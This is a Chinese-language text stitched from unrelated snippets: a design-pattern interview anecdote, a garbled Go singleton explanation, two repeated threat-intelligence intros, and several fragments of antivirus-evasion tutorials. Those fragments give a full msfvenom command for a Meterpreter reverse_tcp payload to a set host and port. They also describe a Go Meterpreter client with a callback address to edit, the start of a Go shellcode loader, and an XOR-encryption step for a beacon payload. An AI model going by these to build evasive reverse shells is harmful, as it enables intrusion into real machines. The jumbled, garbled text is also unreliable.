首先问大家一个问题，你们面试的时候，面试官有没有问过你们："你都用过什么设计模式？"，我猜多数人的回答会把单例模式，放在第一位。我："呃… 我用过单例、工厂、观察者，反向代理，装饰器，哨兵"…. "，面试官内心OS："我都没用过这么多...反向代理是什么鬼，这小子背串了吧，不管了先就坡下驴，从头开始问"。面试官："用过的挺多哈，那么你能说下单例你都在什么情况下用，顺便在这张纸上实现一下单例吧"

概念示例 get­Instanceget­Instance 协程方面又有什么需要注意的吗？ 每当多个协程想要访问实例时， 单例结构体就必须返回相同的实例。 正因如此， 单例设计模式的实施工作很容易出错。 下方的例子表示了创建单例的正确方式。 一些值得注意的地方： nilsingle­Instanceget­Instancesingle­Instancesingle­Instancenil

声明：文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！ 本专题文章导航 2、远控免杀专题文章(2)-msfvenom隐藏的参数：https://www.secpulse.com/archives/123300.html 3、远控免杀专题文章(3)-msf自带免杀(VT免杀率35/69)：https://www

新形势下，红蓝对抗变成了关键信息系统网络安全保护工作的重要组成部分，以实际运行的信息系统为保护目标，最大限度地模拟真实的网络攻击，以此来检验信息系统的实际安全性和运维保障的实际有效性。近期，安恒信息威胁情报中心已经陆续监测捕获了一些红蓝对抗行动相关的样本，其中猎影实验室对这些样本进行了分析和关联，并对之进行一定的总结，将分为几期展开叙述。本期为第一期

Golang实现的x86下的Meterpreter reverse tcp。做静态免杀实验，代码修改自EGESPLOIT 这个开源项目。单独实现主要在于减小程序编译后体积。目前编译后的大小在1.2M左右。使用方法修改go_meterpreter.go中125行代码 s := "http://192.168.121.131:8989" IP和端口修改为自己的地址。然后就可以go build了

一 简单实现（1）msf生成shellcode，选择输出hex格式。msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.133.128 lport=4444 -f hex（2）使用Go编写loader代码。package mainimport ( 'encoding/hex' 'fmt' 'os' 'syscall'

msf是一个很强大的工具，我经常会在渗透用它来反弹shell，不过它生成的反弹后门会被不少杀软kill，这篇文章只是讲讲我在msf中一个简单的免杀小技巧 思路 我以前接触过一款python的远控，其实说是远控，基本也就是nc的功能加了一个服务端的web页面控制并加了一些其他的功能可以用来管理诸多客户机 这款远控我下载下来用过，并用pyinstaller打包成了exe（缺点是体积太过庞大）

0x00 Windows安装Go环境这里不详细讲解，可以参考CSDN详细教程0x01 生成免杀生成一个免杀效果更好的Stageless类型Raw注意：担心Raw格式以及x64附加的payload将项目与有效负载放置Go环境下使用异或加密ShellcodeFrameWork_windows_amd64.exe -shellcodepath x64_beacon.bin -o xor.exe

红蓝对抗已成为新形势下关键信息系统网络安全保护的重要组成部分，以实际运行的信息系统为保护目标，最大限度地模拟真实的黑客入侵，从而检验信息系统的实际可靠性和运行维护的具体有效性。 近日，安恒信息威胁情报中心对一些与红蓝对抗行动相关的样本进行了监控和捕捉，其中猎影实验室对这些样本进行了分析和关联，并对其进行了一定程度的总结，并将其分成几集进行叙述。 一

本文涉及的所有代码和资料：https://github.com/TideSec/GoBypassAV/0x01 基于API的免杀测试1.1 介绍目前基于Go的免杀，很大一部分都是基于已有API来各种姿势的加载shellcode，再加上shellcode的加解密、代码混淆、加壳、条件执行等方法，从而规避杀软的检测。基于Go的各种加载器也就是为shellcode申请一段内存